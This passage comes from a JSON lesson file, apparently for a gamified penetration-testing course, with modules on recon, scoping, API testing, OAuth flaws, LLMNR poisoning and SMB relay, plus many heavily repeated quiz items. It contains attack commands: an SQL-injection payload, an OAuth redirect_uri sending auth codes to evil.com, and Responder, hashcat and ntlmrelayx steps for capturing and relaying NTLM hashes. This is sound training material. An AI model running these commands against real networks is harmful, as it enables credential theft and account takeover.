slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"methodology-recon-workflow","cat":"Reconnaissance","title":"Real-World Recon Workflow","diff":1,"xp":100,"intro":"A step-by-step recon process used on actual engagements.","sections":[{"type":"text","content":"Professional recon follows a flow: passive OSINT first (no packets to target), then semi-passive (DNS queries, cert lookups), then active (port scans, vulnerability scans). Document everything."},{"type":"code","lang":"bash","content":"# Phase 1: Passive (no contact with target)\nwhois target.com\ncrt.sh / cert transparency\nwaybackurls target.com\ntheHarvester -d target.com -b all\n\n# Phase 2: Semi-passive (queries but no exploitation)\ndig target.com ANY\nnslookup -type=MX target.com\namass enum -passive -d target.com\n\n# Phase 3: Active (touching the target)\nnmap -sV -sC -p- target.com\nnikto -h target.com\nnuclei -u target.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"What order should recon follow?","opts":["Active then passive","Passive then semi-passive then active","Random","Only active scanning"],"ans":1},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"methodology-report-writing","cat":"Post-Exploitation","title":"Pentest Report Writing","diff":1,"xp":100,"intro":"Your findings are worthless if the client can't understand the report.","sections":[{"type":"text","content":"A professional report has: Executive Summary (business risk, no jargon), Technical Findings (each with severity, description, evidence, remediation), Methodology section, and Appendices (raw output)."},{"type":"code","lang":"bash","content":"# Finding template:\n## SQLi in Login Form (CRITICAL)\n**Risk:** Attacker can extract all user data including passwords\n**URL:** https://app.target.com/api/login\n**Parameter:** username\n**Payload:** ' OR 1=1--\n**Evidence:** [screenshot of extracted data]\n**Remediation:** Use parameterized queries.\n  Before: query = \"SELECT * FROM users WHERE user='\" + input + \"'\"\n  After:  cursor.execute(\"SELECT * FROM users WHERE user=?\", (input,))"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"The executive summary should be written for...","opts":["Other pentesters","The IT team","Business leadership (non-technical)","The legal team"],"ans":2},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"methodology-scope-rules","cat":"Reconnaissance","title":"Rules of Engagement & Scoping","diff":1,"xp":50,"intro":"Break the scope and you break the law. Know your boundaries.","sections":[{"type":"text","content":"Before touching anything: get written authorization, define in-scope targets (IPs, domains, apps), out-of-scope systems, testing hours, emergency contacts, and whether social engineering/DoS is allowed."},{"type":"code","lang":"bash","content":"# Scope document checklist:\n# 1. Written authorization (signed by someone with authority)\n# 2. In-scope IPs/domains/apps (explicit list)\n# 3. Out-of-scope systems (database servers? production?)\n# 4. Testing window (business hours only? weekends?)\n# 5. Attack types allowed (social engineering? DoS? physical?)\n# 6. Emergency contact (who to call if something breaks)\n# 7. Data handling (can you exfil data? store credentials?)\n# 8. Reporting timeline and format"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Testing without written authorization is...","opts":["Fine if you find something","Illegal in most jurisdictions","Only illegal for government systems","Acceptable for bug bounties"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"web-api-testing","cat":"Web Application","title":"REST API Security Testing","diff":2,"xp":150,"intro":"Most modern apps are APIs behind a frontend. Test the API directly.","sections":[{"type":"text","content":"Skip the UI and hit the API endpoints directly with curl/Burp. Test authentication, authorization (IDOR), input validation, rate limiting, and error handling."},{"type":"code","lang":"bash","content":"# Enumerate API endpoints\ncurl -s https://api.target.com/docs\ncurl -s https://api.target.com/swagger.json\n\n# Test auth bypass\ncurl https://api.target.com/admin/users -H 'Authorization: Bearer invalid_token'\n\n# Test IDOR\ncurl https://api.target.com/users/1/profile  # your profile\ncurl https://api.target.com/users/2/profile  # someone else's\n\n# Test mass assignment\ncurl -X PUT https://api.target.com/users/me -d '{\"role\":\"admin\"}'\n\n# Test rate limiting\nfor i in $(seq 1 100); do curl -s -o /dev/null -w '%{http_code}\\n' https://api.target.com/login -d '{\"user\":\"admin\",\"pass\":\"test''$i'''\"}'; done"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"IDOR in an API means...","opts":["The API is slow","You can access other users' data by changing an ID","The API uses XML","Authentication is broken"],"ans":1},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-subdomain-takeover","cat":"Web Application","title":"Subdomain Takeover","diff":2,"xp":150,"intro":"A dangling CNAME pointing to a decommissioned service lets you claim it.","sections":[{"type":"text","content":"When old.target.com has a CNAME to something.herokuapp.com, but the Heroku app was deleted, anyone can create a new Heroku app and claim that subdomain. Cookie theft, phishing, and credential harvesting follow."},{"type":"code","lang":"bash","content":"# Find dangling CNAMEs\ndig old.target.com CNAME +short\n# If it points to a cloud service that returns 404/NXDOMAIN:\n# Heroku: 'No such app'\n# S3: 'NoSuchBucket'\n# GitHub Pages: '404 There isn't a GitHub Pages site here'\n# Azure: 'NXDOMAIN'\n\n# Automated scanning\nsubjack -w subdomains.txt -t 100 -ssl\nnuclei -l subdomains.txt -t takeovers/"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Subdomain takeover requires...","opts":["A SQL injection","A CNAME pointing to an unclaimed cloud resource","Physical access","A buffer overflow"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-oauth-flaws","cat":"Web Application","title":"OAuth 2.0 Attack Vectors","diff":2,"xp":200,"intro":"OAuth misconfigurations: open redirects, token leaks, CSRF on the callback.","sections":[{"type":"text","content":"OAuth flows can be attacked: steal tokens via open redirect in redirect_uri, CSRF on the callback endpoint, scope escalation, and token reuse across services."},{"type":"code","lang":"bash","content":"# Test open redirect in redirect_uri\nhttps://auth.target.com/authorize?\n  client_id=legit&\n  redirect_uri=https://evil.com/steal&\n  response_type=code\n\n# If the server doesn't validate redirect_uri strictly,\n# the auth code goes to evil.com\n\n# CSRF on callback (no state parameter)\nhttps://target.com/callback?code=ATTACKER_CODE\n# Links victim's account to attacker's identity"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"The 'state' parameter in OAuth prevents...","opts":["Token theft","CSRF on the callback","SQL injection","XSS"],"ans":1},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"network-responder","cat":"Network Attacks","title":"LLMNR/NBT-NS Poisoning with Responder","diff":1,"xp":100,"intro":"Steal NTLMv2 hashes by answering name resolution queries on the LAN.","sections":[{"type":"text","content":"When a Windows machine can't resolve a name via DNS, it broadcasts LLMNR/NBT-NS queries. Responder answers them and captures NTLMv2 hashes."},{"type":"code","lang":"bash","content":"# Run Responder\nsudo responder -I eth0 -rdwv\n# Wait for hashes... machines constantly make typos in share names\n# Captured hashes appear in /usr/share/responder/logs/\n\n# Crack the NTLMv2 hash\nhashcat -m 5600 hash.txt rockyou.txt\n\n# Or relay the hash instead of cracking (no cracking needed)\nimpacket-ntlmrelayx -tf targets.txt -smb2support"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"LLMNR/NBT-NS poisoning works because Windows...","opts":["Encrypts all traffic","Broadcasts name queries that anyone can answer","Uses strong authentication","Validates responses"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"network-smb-relay","cat":"Network Attacks","title":"SMB Relay Attacks","diff":2,"xp":200,"intro":"Don't crack the hash - relay it to another machine for instant access.","sections":[{"type":"text","content":"Instead of cracking a captured NTLMv2 hash, relay it to a different server. If SMB signing isn't required, you authenticate as the victim on the relay target."},{"type":"code","lang":"bash","content":"# Find machines without SMB signing required\ncrackmapexec smb 10.10.10.0/24 --gen-relay-list relay-targets.txt\n\n# Run ntlmrelayx\nimpacket-ntlmrelayx -tf relay-targets.txt -smb2support\n\n# In another terminal, run Responder (disable SMB+HTTP to avoid conflicts)\nsudo responder -I eth0 -rdwv --disable-ess\n\n# When a user authenticates, their hash is 